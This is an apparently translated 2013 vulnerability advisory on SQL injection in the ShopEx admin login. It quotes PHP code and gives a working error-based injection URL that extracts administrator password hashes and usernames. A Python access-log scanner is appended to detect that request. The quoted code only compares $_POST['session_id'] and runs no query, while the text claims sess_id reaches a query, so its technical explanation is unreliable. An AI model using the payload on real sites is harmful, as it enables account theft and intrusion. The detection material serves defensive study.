ShopEx latest backend page injection - Vulnerability warning - The Black Bar Safety Net

2013-08-06T00:00:00
ID MYHACK58:62201340098
Type myhack58
Reporter 0day5
Modified 2013-08-06T00:00:00

Description

In \shopex\core\admin\controller\ctl.passport.php, tracing the backend login authentication process:

function certi_validate(){
    $cert = $this->system->loadModel('service/certificate');
    // User-controlled value, taken from the request without any filtering
    $sess_id = $_POST['session_id'];
    $return = array();
    if($sess_id == $cert->get_sess()){
        $return = array(
            'res' => 'succ',
            'msg' => '',
            'info' => ''
        );
        echo json_encode($return);
    }else{
        $return = array(
            'res' => 'fail',
            'msg' => '0 0 0 0 0 1',
            'info' => 'You have the different session!'
        );
        echo json_encode($return);
    }
}

The sess_id parameter is passed in without any processing and goes directly into the query.

The exp:

http://www.0day5.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1

Note that this does not work against every version; it is valid on the lower versions.
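
A detection-side check for the request described above, as an added example that is not part of the original advisory: it scans web access-log lines for passport-controller requests whose sess_id (or session_id) value is not a plain token. The combined log format, the alphanumeric token pattern and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate session id is a short alphanumeric token.
SESSION_ID_OK = re.compile(r"^[A-Za-z0-9]{1,64}$")
# Markers of the error-based injection pattern shown in the advisory.
SQLI_MARKERS = re.compile(
    r"information_schema|\bselect\b|\bconcat\s*\(|floor\s*\(\s*rand|sdb_operators",
    re.IGNORECASE,
)
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
PARAMS = ("sess_id", "session_id")

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Aug/2013:10:00:01 +0800] "GET /shopadmin/index.php?ctl=passport&act=login&sess_id=9f2c4e1ab7 HTTP/1.1" 200 512',
    '203.0.113.9 - - [06/Aug/2013:10:00:05 +0800] "GET /shopadmin/index.php?ctl=passport&act=login&sess_id=1%27+and(select+count(*)+from+information_schema.tables)+and+%271%27=%271 HTTP/1.1" 200 731',
    '203.0.113.9 - - [06/Aug/2013:10:00:09 +0800] "GET /shopadmin/index.php?ctl=passport&act=login&sess_id=abc%27 HTTP/1.1" 200 498',
    '203.0.113.7 - - [06/Aug/2013:10:00:12 +0800] "GET /shopadmin/index.php?ctl=order&act=index HTTP/1.1" 200 2048',
]


def inspect_line(line):
    """Return (verdict, value) for a passport request, or None if unrelated."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if query.get("ctl") != ["passport"]:
        return None
    for name in PARAMS:
        for value in query.get(name, []):  # parse_qs has already URL-decoded
            if SQLI_MARKERS.search(value):
                return ("sqli", value)
            if not SESSION_ID_OK.match(value):
                return ("malformed", value)
    return ("ok", None)


def scan(lines):
    """Return (line_number, verdict, value) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = inspect_line(line)
        if result and result[0] != "ok":
            hits.append((number, result[0], result[1]))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs normally record only the query string, so a value sent in the POST body (as read by `$_POST['session_id']` in the function above) needs request-body logging or a WAF rule to be seen.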